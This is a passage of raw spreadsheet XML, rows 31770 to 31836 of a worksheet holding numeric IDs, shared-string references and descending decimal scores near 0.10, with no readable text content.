    <row r="31770" ht="15.75" customHeight="1">
      <c r="A31770" s="1">
        <v>9052.0</v>
      </c>
      <c r="B31770" s="2">
        <v>5.5071688E7</v>
      </c>
      <c r="C31770" s="2" t="s">
        <v>30557</v>
      </c>
      <c r="D31770" s="2">
        <v>1.0</v>
      </c>
      <c r="E31770" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31770" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="31771" ht="15.75" customHeight="1">
      <c r="A31771" s="1">
        <v>26189.0</v>
      </c>
      <c r="B31771" s="2">
        <v>1.6160882E7</v>
      </c>
      <c r="C31771" s="2" t="s">
        <v>30558</v>
      </c>
      <c r="D31771" s="2">
        <v>1.0</v>
      </c>
      <c r="E31771" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31771" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="31772" ht="15.75" customHeight="1">
      <c r="A31772" s="1">
        <v>32385.0</v>
      </c>
      <c r="B31772" s="2">
        <v>5.6199578E7</v>
      </c>
      <c r="C31772" s="2" t="s">
        <v>30559</v>
      </c>
      <c r="D31772" s="2">
        <v>1.0</v>
      </c>
      <c r="E31772" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31772" s="2">
        <v>0.1029143897996357</v>
      </c>
    </row>
    <row r="31773" ht="15.75" customHeight="1">
      <c r="A31773" s="1">
        <v>1130.0</v>
      </c>
      <c r="B31773" s="2">
        <v>2.4188227E7</v>
      </c>
      <c r="C31773" s="2" t="s">
        <v>30560</v>
      </c>
      <c r="D31773" s="2">
        <v>1.0</v>
      </c>
      <c r="E31773" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31773" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31774" ht="15.75" customHeight="1">
      <c r="A31774" s="1">
        <v>2453.0</v>
      </c>
      <c r="B31774" s="2">
        <v>3.3715641E7</v>
      </c>
      <c r="C31774" s="2" t="s">
        <v>30561</v>
      </c>
      <c r="D31774" s="2">
        <v>1.0</v>
      </c>
      <c r="E31774" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31774" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31775" ht="15.75" customHeight="1">
      <c r="A31775" s="1">
        <v>4588.0</v>
      </c>
      <c r="B31775" s="2">
        <v>4.2795419E7</v>
      </c>
      <c r="C31775" s="2" t="s">
        <v>30562</v>
      </c>
      <c r="D31775" s="2">
        <v>1.0</v>
      </c>
      <c r="E31775" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31775" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31776" ht="15.75" customHeight="1">
      <c r="A31776" s="1">
        <v>6031.0</v>
      </c>
      <c r="B31776" s="2">
        <v>4.7572498E7</v>
      </c>
      <c r="C31776" s="2" t="s">
        <v>30563</v>
      </c>
      <c r="D31776" s="2">
        <v>1.0</v>
      </c>
      <c r="E31776" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31776" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31777" ht="15.75" customHeight="1">
      <c r="A31777" s="1">
        <v>10499.0</v>
      </c>
      <c r="B31777" s="2">
        <v>1.1346658E7</v>
      </c>
      <c r="C31777" s="2" t="s">
        <v>30564</v>
      </c>
      <c r="D31777" s="2">
        <v>1.0</v>
      </c>
      <c r="E31777" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31777" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31778" ht="15.75" customHeight="1">
      <c r="A31778" s="1">
        <v>14332.0</v>
      </c>
      <c r="B31778" s="2">
        <v>3.8761844E7</v>
      </c>
      <c r="C31778" s="2" t="s">
        <v>30565</v>
      </c>
      <c r="D31778" s="2">
        <v>1.0</v>
      </c>
      <c r="E31778" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31778" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31779" ht="15.75" customHeight="1">
      <c r="A31779" s="1">
        <v>14682.0</v>
      </c>
      <c r="B31779" s="2">
        <v>4.0496559E7</v>
      </c>
      <c r="C31779" s="2" t="s">
        <v>30566</v>
      </c>
      <c r="D31779" s="2">
        <v>1.0</v>
      </c>
      <c r="E31779" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31779" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31780" ht="15.75" customHeight="1">
      <c r="A31780" s="1">
        <v>15817.0</v>
      </c>
      <c r="B31780" s="2">
        <v>4.4263121E7</v>
      </c>
      <c r="C31780" s="5" t="s">
        <v>30567</v>
      </c>
      <c r="D31780" s="2">
        <v>1.0</v>
      </c>
      <c r="E31780" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31780" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31781" ht="15.75" customHeight="1">
      <c r="A31781" s="1">
        <v>19015.0</v>
      </c>
      <c r="B31781" s="2">
        <v>5.4524318E7</v>
      </c>
      <c r="C31781" s="2" t="s">
        <v>30568</v>
      </c>
      <c r="D31781" s="2">
        <v>1.0</v>
      </c>
      <c r="E31781" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31781" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31782" ht="15.75" customHeight="1">
      <c r="A31782" s="1">
        <v>19720.0</v>
      </c>
      <c r="B31782" s="2">
        <v>5.6592119E7</v>
      </c>
      <c r="C31782" s="2" t="s">
        <v>30569</v>
      </c>
      <c r="D31782" s="2">
        <v>1.0</v>
      </c>
      <c r="E31782" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31782" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31783" ht="15.75" customHeight="1">
      <c r="A31783" s="1">
        <v>20035.0</v>
      </c>
      <c r="B31783" s="2">
        <v>7308739.0</v>
      </c>
      <c r="C31783" s="2" t="s">
        <v>30570</v>
      </c>
      <c r="D31783" s="2">
        <v>1.0</v>
      </c>
      <c r="E31783" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31783" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31784" ht="15.75" customHeight="1">
      <c r="A31784" s="1">
        <v>21337.0</v>
      </c>
      <c r="B31784" s="2">
        <v>2.1085702E7</v>
      </c>
      <c r="C31784" s="2" t="s">
        <v>30571</v>
      </c>
      <c r="D31784" s="2">
        <v>1.0</v>
      </c>
      <c r="E31784" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31784" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31785" ht="15.75" customHeight="1">
      <c r="A31785" s="1">
        <v>23723.0</v>
      </c>
      <c r="B31785" s="2">
        <v>7234105.0</v>
      </c>
      <c r="C31785" s="2" t="s">
        <v>30572</v>
      </c>
      <c r="D31785" s="2">
        <v>1.0</v>
      </c>
      <c r="E31785" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31785" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31786" ht="15.75" customHeight="1">
      <c r="A31786" s="1">
        <v>24848.0</v>
      </c>
      <c r="B31786" s="2">
        <v>1.2191345E7</v>
      </c>
      <c r="C31786" s="2" t="s">
        <v>30573</v>
      </c>
      <c r="D31786" s="2">
        <v>1.0</v>
      </c>
      <c r="E31786" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31786" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31787" ht="15.75" customHeight="1">
      <c r="A31787" s="1">
        <v>26491.0</v>
      </c>
      <c r="B31787" s="2">
        <v>1.7515263E7</v>
      </c>
      <c r="C31787" s="2" t="s">
        <v>30574</v>
      </c>
      <c r="D31787" s="2">
        <v>1.0</v>
      </c>
      <c r="E31787" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31787" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31788" ht="15.75" customHeight="1">
      <c r="A31788" s="1">
        <v>27072.0</v>
      </c>
      <c r="B31788" s="2">
        <v>2.0421752E7</v>
      </c>
      <c r="C31788" s="2" t="s">
        <v>30575</v>
      </c>
      <c r="D31788" s="2">
        <v>1.0</v>
      </c>
      <c r="E31788" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31788" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31789" ht="15.75" customHeight="1">
      <c r="A31789" s="1">
        <v>27252.0</v>
      </c>
      <c r="B31789" s="2">
        <v>2.1085701E7</v>
      </c>
      <c r="C31789" s="2" t="s">
        <v>30576</v>
      </c>
      <c r="D31789" s="2">
        <v>1.0</v>
      </c>
      <c r="E31789" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31789" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31790" ht="15.75" customHeight="1">
      <c r="A31790" s="1">
        <v>28658.0</v>
      </c>
      <c r="B31790" s="2">
        <v>2.7410363E7</v>
      </c>
      <c r="C31790" s="2" t="s">
        <v>30577</v>
      </c>
      <c r="D31790" s="2">
        <v>1.0</v>
      </c>
      <c r="E31790" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31790" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31791" ht="15.75" customHeight="1">
      <c r="A31791" s="1">
        <v>28903.0</v>
      </c>
      <c r="B31791" s="2">
        <v>2.9381033E7</v>
      </c>
      <c r="C31791" s="2" t="s">
        <v>30578</v>
      </c>
      <c r="D31791" s="2">
        <v>1.0</v>
      </c>
      <c r="E31791" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31791" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31792" ht="15.75" customHeight="1">
      <c r="A31792" s="1">
        <v>28982.0</v>
      </c>
      <c r="B31792" s="2">
        <v>2.982126E7</v>
      </c>
      <c r="C31792" s="2" t="s">
        <v>30579</v>
      </c>
      <c r="D31792" s="2">
        <v>1.0</v>
      </c>
      <c r="E31792" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31792" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31793" ht="15.75" customHeight="1">
      <c r="A31793" s="1">
        <v>29520.0</v>
      </c>
      <c r="B31793" s="2">
        <v>3.2766527E7</v>
      </c>
      <c r="C31793" s="2" t="s">
        <v>30580</v>
      </c>
      <c r="D31793" s="2">
        <v>1.0</v>
      </c>
      <c r="E31793" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31793" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31794" ht="15.75" customHeight="1">
      <c r="A31794" s="1">
        <v>30092.0</v>
      </c>
      <c r="B31794" s="2">
        <v>3.639723E7</v>
      </c>
      <c r="C31794" s="2" t="s">
        <v>30581</v>
      </c>
      <c r="D31794" s="2">
        <v>1.0</v>
      </c>
      <c r="E31794" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31794" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="31795" ht="15.75" customHeight="1">
      <c r="A31795" s="1">
        <v>11320.0</v>
      </c>
      <c r="B31795" s="2">
        <v>2.1080342E7</v>
      </c>
      <c r="C31795" s="2" t="s">
        <v>30582</v>
      </c>
      <c r="D31795" s="2">
        <v>1.0</v>
      </c>
      <c r="E31795" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31795" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="31796" ht="15.75" customHeight="1">
      <c r="A31796" s="1">
        <v>21601.0</v>
      </c>
      <c r="B31796" s="2">
        <v>2.4171839E7</v>
      </c>
      <c r="C31796" s="2" t="s">
        <v>30583</v>
      </c>
      <c r="D31796" s="2">
        <v>1.0</v>
      </c>
      <c r="E31796" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31796" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="31797" ht="15.75" customHeight="1">
      <c r="A31797" s="1">
        <v>13292.0</v>
      </c>
      <c r="B31797" s="2">
        <v>3.4461272E7</v>
      </c>
      <c r="C31797" s="2" t="s">
        <v>30584</v>
      </c>
      <c r="D31797" s="2">
        <v>1.0</v>
      </c>
      <c r="E31797" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31797" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="31798" ht="15.75" customHeight="1">
      <c r="A31798" s="1">
        <v>33613.0</v>
      </c>
      <c r="B31798" s="2">
        <v>8342404.0</v>
      </c>
      <c r="C31798" s="2" t="s">
        <v>30585</v>
      </c>
      <c r="D31798" s="2">
        <v>1.0</v>
      </c>
      <c r="E31798" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31798" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="31799" ht="15.75" customHeight="1">
      <c r="A31799" s="1">
        <v>15200.0</v>
      </c>
      <c r="B31799" s="2">
        <v>4.2076435E7</v>
      </c>
      <c r="C31799" s="2" t="s">
        <v>30586</v>
      </c>
      <c r="D31799" s="2">
        <v>1.0</v>
      </c>
      <c r="E31799" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31799" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="31800" ht="15.75" customHeight="1">
      <c r="A31800" s="1">
        <v>25841.0</v>
      </c>
      <c r="B31800" s="2">
        <v>1.4792727E7</v>
      </c>
      <c r="C31800" s="2" t="s">
        <v>30587</v>
      </c>
      <c r="D31800" s="2">
        <v>1.0</v>
      </c>
      <c r="E31800" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31800" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="31801" ht="15.75" customHeight="1">
      <c r="A31801" s="1">
        <v>27440.0</v>
      </c>
      <c r="B31801" s="2">
        <v>2.1974457E7</v>
      </c>
      <c r="C31801" s="2" t="s">
        <v>30588</v>
      </c>
      <c r="D31801" s="2">
        <v>1.0</v>
      </c>
      <c r="E31801" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31801" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="31802" ht="15.75" customHeight="1">
      <c r="A31802" s="1">
        <v>32823.0</v>
      </c>
      <c r="B31802" s="2">
        <v>6217476.0</v>
      </c>
      <c r="C31802" s="2" t="s">
        <v>30589</v>
      </c>
      <c r="D31802" s="2">
        <v>1.0</v>
      </c>
      <c r="E31802" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31802" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="31803" ht="15.75" customHeight="1">
      <c r="A31803" s="1">
        <v>5846.0</v>
      </c>
      <c r="B31803" s="2">
        <v>4.6929937E7</v>
      </c>
      <c r="C31803" s="2" t="s">
        <v>30590</v>
      </c>
      <c r="D31803" s="2">
        <v>1.0</v>
      </c>
      <c r="E31803" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31803" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="31804" ht="15.75" customHeight="1">
      <c r="A31804" s="1">
        <v>11417.0</v>
      </c>
      <c r="B31804" s="2">
        <v>2.1661495E7</v>
      </c>
      <c r="C31804" s="2" t="s">
        <v>30591</v>
      </c>
      <c r="D31804" s="2">
        <v>1.0</v>
      </c>
      <c r="E31804" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31804" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="31805" ht="15.75" customHeight="1">
      <c r="A31805" s="1">
        <v>12708.0</v>
      </c>
      <c r="B31805" s="2">
        <v>3.0825561E7</v>
      </c>
      <c r="C31805" s="2" t="s">
        <v>30592</v>
      </c>
      <c r="D31805" s="2">
        <v>1.0</v>
      </c>
      <c r="E31805" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31805" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="31806" ht="15.75" customHeight="1">
      <c r="A31806" s="1">
        <v>16892.0</v>
      </c>
      <c r="B31806" s="2">
        <v>4.8048465E7</v>
      </c>
      <c r="C31806" s="2" t="s">
        <v>30593</v>
      </c>
      <c r="D31806" s="2">
        <v>1.0</v>
      </c>
      <c r="E31806" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31806" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="31807" ht="15.75" customHeight="1">
      <c r="A31807" s="1">
        <v>19551.0</v>
      </c>
      <c r="B31807" s="2">
        <v>5.605664E7</v>
      </c>
      <c r="C31807" s="2" t="s">
        <v>30594</v>
      </c>
      <c r="D31807" s="2">
        <v>1.0</v>
      </c>
      <c r="E31807" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31807" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="31808" ht="15.75" customHeight="1">
      <c r="A31808" s="1">
        <v>24395.0</v>
      </c>
      <c r="B31808" s="2">
        <v>1.078321E7</v>
      </c>
      <c r="C31808" s="2" t="s">
        <v>30595</v>
      </c>
      <c r="D31808" s="2">
        <v>1.0</v>
      </c>
      <c r="E31808" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31808" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="31809" ht="15.75" customHeight="1">
      <c r="A31809" s="1">
        <v>25119.0</v>
      </c>
      <c r="B31809" s="2">
        <v>1.2972286E7</v>
      </c>
      <c r="C31809" s="2" t="s">
        <v>30596</v>
      </c>
      <c r="D31809" s="2">
        <v>1.0</v>
      </c>
      <c r="E31809" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31809" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="31810" ht="15.75" customHeight="1">
      <c r="A31810" s="1">
        <v>28241.0</v>
      </c>
      <c r="B31810" s="2">
        <v>2.5226602E7</v>
      </c>
      <c r="C31810" s="2" t="s">
        <v>30597</v>
      </c>
      <c r="D31810" s="2">
        <v>1.0</v>
      </c>
      <c r="E31810" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31810" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="31811" ht="15.75" customHeight="1">
      <c r="A31811" s="1">
        <v>31339.0</v>
      </c>
      <c r="B31811" s="2">
        <v>4979624.0</v>
      </c>
      <c r="C31811" s="2" t="s">
        <v>30598</v>
      </c>
      <c r="D31811" s="2">
        <v>1.0</v>
      </c>
      <c r="E31811" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31811" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="31812" ht="15.75" customHeight="1">
      <c r="A31812" s="1">
        <v>629.0</v>
      </c>
      <c r="B31812" s="2">
        <v>1.9661147E7</v>
      </c>
      <c r="C31812" s="2" t="s">
        <v>30599</v>
      </c>
      <c r="D31812" s="2">
        <v>1.0</v>
      </c>
      <c r="E31812" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31812" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="31813" ht="15.75" customHeight="1">
      <c r="A31813" s="1">
        <v>4056.0</v>
      </c>
      <c r="B31813" s="2">
        <v>4.1118318E7</v>
      </c>
      <c r="C31813" s="2" t="s">
        <v>30600</v>
      </c>
      <c r="D31813" s="2">
        <v>1.0</v>
      </c>
      <c r="E31813" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31813" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="31814" ht="15.75" customHeight="1">
      <c r="A31814" s="1">
        <v>13248.0</v>
      </c>
      <c r="B31814" s="2">
        <v>3.4265174E7</v>
      </c>
      <c r="C31814" s="2" t="s">
        <v>30601</v>
      </c>
      <c r="D31814" s="2">
        <v>1.0</v>
      </c>
      <c r="E31814" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31814" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="31815" ht="15.75" customHeight="1">
      <c r="A31815" s="1">
        <v>15540.0</v>
      </c>
      <c r="B31815" s="2">
        <v>4.3366476E7</v>
      </c>
      <c r="C31815" s="2" t="s">
        <v>30602</v>
      </c>
      <c r="D31815" s="2">
        <v>1.0</v>
      </c>
      <c r="E31815" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31815" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="31816" ht="15.75" customHeight="1">
      <c r="A31816" s="1">
        <v>20265.0</v>
      </c>
      <c r="B31816" s="2">
        <v>1.1073354E7</v>
      </c>
      <c r="C31816" s="2" t="s">
        <v>30603</v>
      </c>
      <c r="D31816" s="2">
        <v>1.0</v>
      </c>
      <c r="E31816" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31816" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="31817" ht="15.75" customHeight="1">
      <c r="A31817" s="1">
        <v>22081.0</v>
      </c>
      <c r="B31817" s="2">
        <v>3.0708876E7</v>
      </c>
      <c r="C31817" s="2" t="s">
        <v>30604</v>
      </c>
      <c r="D31817" s="2">
        <v>1.0</v>
      </c>
      <c r="E31817" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31817" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="31818" ht="15.75" customHeight="1">
      <c r="A31818" s="1">
        <v>25215.0</v>
      </c>
      <c r="B31818" s="2">
        <v>1.3263055E7</v>
      </c>
      <c r="C31818" s="2" t="s">
        <v>30605</v>
      </c>
      <c r="D31818" s="2">
        <v>1.0</v>
      </c>
      <c r="E31818" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31818" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="31819" ht="15.75" customHeight="1">
      <c r="A31819" s="1">
        <v>27265.0</v>
      </c>
      <c r="B31819" s="2">
        <v>2.1164051E7</v>
      </c>
      <c r="C31819" s="2" t="s">
        <v>30606</v>
      </c>
      <c r="D31819" s="2">
        <v>1.0</v>
      </c>
      <c r="E31819" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31819" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="31820" ht="15.75" customHeight="1">
      <c r="A31820" s="1">
        <v>29356.0</v>
      </c>
      <c r="B31820" s="2">
        <v>3.1621953E7</v>
      </c>
      <c r="C31820" s="2" t="s">
        <v>30607</v>
      </c>
      <c r="D31820" s="2">
        <v>1.0</v>
      </c>
      <c r="E31820" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31820" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="31821" ht="15.75" customHeight="1">
      <c r="A31821" s="1">
        <v>2771.0</v>
      </c>
      <c r="B31821" s="2">
        <v>3.5158778E7</v>
      </c>
      <c r="C31821" s="2" t="s">
        <v>30608</v>
      </c>
      <c r="D31821" s="2">
        <v>1.0</v>
      </c>
      <c r="E31821" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31821" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="31822" ht="15.75" customHeight="1">
      <c r="A31822" s="1">
        <v>10303.0</v>
      </c>
      <c r="B31822" s="2">
        <v>5.7667674E7</v>
      </c>
      <c r="C31822" s="2" t="s">
        <v>30609</v>
      </c>
      <c r="D31822" s="2">
        <v>1.0</v>
      </c>
      <c r="E31822" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31822" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="31823" ht="15.75" customHeight="1">
      <c r="A31823" s="1">
        <v>13315.0</v>
      </c>
      <c r="B31823" s="2">
        <v>3.4570571E7</v>
      </c>
      <c r="C31823" s="2" t="s">
        <v>30610</v>
      </c>
      <c r="D31823" s="2">
        <v>1.0</v>
      </c>
      <c r="E31823" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31823" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="31824" ht="15.75" customHeight="1">
      <c r="A31824" s="1">
        <v>16420.0</v>
      </c>
      <c r="B31824" s="2">
        <v>4.6307112E7</v>
      </c>
      <c r="C31824" s="2" t="s">
        <v>30611</v>
      </c>
      <c r="D31824" s="2">
        <v>1.0</v>
      </c>
      <c r="E31824" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31824" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="31825" ht="15.75" customHeight="1">
      <c r="A31825" s="1">
        <v>33293.0</v>
      </c>
      <c r="B31825" s="2">
        <v>7481580.0</v>
      </c>
      <c r="C31825" s="2" t="s">
        <v>30612</v>
      </c>
      <c r="D31825" s="2">
        <v>1.0</v>
      </c>
      <c r="E31825" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31825" s="2">
        <v>0.1016771488469602</v>
      </c>
    </row>
    <row r="31826" ht="15.75" customHeight="1">
      <c r="A31826" s="1">
        <v>2875.0</v>
      </c>
      <c r="B31826" s="2">
        <v>3.56425E7</v>
      </c>
      <c r="C31826" s="2" t="s">
        <v>30613</v>
      </c>
      <c r="D31826" s="2">
        <v>1.0</v>
      </c>
      <c r="E31826" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31826" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="31827" ht="15.75" customHeight="1">
      <c r="A31827" s="1">
        <v>3574.0</v>
      </c>
      <c r="B31827" s="2">
        <v>3.8965493E7</v>
      </c>
      <c r="C31827" s="2" t="s">
        <v>30614</v>
      </c>
      <c r="D31827" s="2">
        <v>1.0</v>
      </c>
      <c r="E31827" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31827" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="31828" ht="15.75" customHeight="1">
      <c r="A31828" s="1">
        <v>3624.0</v>
      </c>
      <c r="B31828" s="2">
        <v>3.9208316E7</v>
      </c>
      <c r="C31828" s="2" t="s">
        <v>30615</v>
      </c>
      <c r="D31828" s="2">
        <v>1.0</v>
      </c>
      <c r="E31828" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31828" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="31829" ht="15.75" customHeight="1">
      <c r="A31829" s="1">
        <v>9286.0</v>
      </c>
      <c r="B31829" s="2">
        <v>5.5535855E7</v>
      </c>
      <c r="C31829" s="2" t="s">
        <v>30616</v>
      </c>
      <c r="D31829" s="2">
        <v>1.0</v>
      </c>
      <c r="E31829" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31829" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="31830" ht="15.75" customHeight="1">
      <c r="A31830" s="1">
        <v>10100.0</v>
      </c>
      <c r="B31830" s="2">
        <v>5.720794E7</v>
      </c>
      <c r="C31830" s="2" t="s">
        <v>30617</v>
      </c>
      <c r="D31830" s="2">
        <v>1.0</v>
      </c>
      <c r="E31830" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31830" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="31831" ht="15.75" customHeight="1">
      <c r="A31831" s="1">
        <v>11747.0</v>
      </c>
      <c r="B31831" s="2">
        <v>2.410245E7</v>
      </c>
      <c r="C31831" s="2" t="s">
        <v>30618</v>
      </c>
      <c r="D31831" s="2">
        <v>1.0</v>
      </c>
      <c r="E31831" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31831" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="31832" ht="15.75" customHeight="1">
      <c r="A31832" s="1">
        <v>18995.0</v>
      </c>
      <c r="B31832" s="2">
        <v>5.4430628E7</v>
      </c>
      <c r="C31832" s="5" t="s">
        <v>30619</v>
      </c>
      <c r="D31832" s="2">
        <v>1.0</v>
      </c>
      <c r="E31832" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31832" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="31833" ht="15.75" customHeight="1">
      <c r="A31833" s="1">
        <v>19368.0</v>
      </c>
      <c r="B31833" s="2">
        <v>5.5470315E7</v>
      </c>
      <c r="C31833" s="2" t="s">
        <v>30620</v>
      </c>
      <c r="D31833" s="2">
        <v>1.0</v>
      </c>
      <c r="E31833" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31833" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="31834" ht="15.75" customHeight="1">
      <c r="A31834" s="1">
        <v>15461.0</v>
      </c>
      <c r="B31834" s="2">
        <v>4.3090162E7</v>
      </c>
      <c r="C31834" s="2" t="s">
        <v>30621</v>
      </c>
      <c r="D31834" s="2">
        <v>1.0</v>
      </c>
      <c r="E31834" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31834" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="31835" ht="15.75" customHeight="1">
      <c r="A31835" s="1">
        <v>546.0</v>
      </c>
      <c r="B31835" s="2">
        <v>1.8733802E7</v>
      </c>
      <c r="C31835" s="2" t="s">
        <v>30622</v>
      </c>
      <c r="D31835" s="2">
        <v>1.0</v>
      </c>
      <c r="E31835" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31835" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="31836" ht="15.75" customHeight="1">
      <c r="A31836" s="1">
        <v>1299.0</v>
      </c>
      <c r="B31836" s="2">
        <v>2.5648544E7</v>
      </c>
      <c r="C31836" s="2" t="s">
        <v>30623</v>
      </c>
      <c r="D31836" s="2">
        <v>1.0</v>
      </c>
      <c r="E31836" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31836" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
